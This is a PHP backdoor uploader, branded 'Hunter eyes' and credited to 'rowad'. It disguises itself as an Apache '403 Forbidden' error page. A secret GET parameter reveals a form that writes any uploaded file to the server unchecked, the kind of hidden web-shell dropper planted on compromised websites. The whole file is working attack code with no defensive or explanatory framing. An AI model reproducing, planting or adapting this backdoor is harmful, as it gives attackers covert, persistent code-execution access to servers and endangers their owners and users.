<?php if(isset($_GET['up']))
Echo '<center>
<br><img src="https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-xfp1/v/t1.0-9/10425499_323929457801235_9056984115611549952_n.jpg?oh=47559d485d30e347a59698ed7a84cf86&oe=5542EB07&__gda__=1430774414_0d642e47946d0a5c65768e8ab868de93" width="450" height="250"></p>
<hr>
</hr>
<font face="tahoma" color="red" size="8">Hunter</font>
<font face="tahoma" color="silver" size="8">eyes</font>
<font face="tahoma" color="black" size="6">uploade</font>
<br><font face="tahoma" color="#8F8F8F" size="5">Cod3d by : rowad</font></br>
<form method="post" target="_self" enctype="multipart/form-data">
<input type="file" size="20" name="uploads" />
<input type="submit" value="upload" />
</form>
</center></td></tr>
</table><br>';
if (!empty ($_FILES['uploads']))
{
move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
Echo "<script>alert('upload Done');
</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You dont have permission to access /
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>';
?>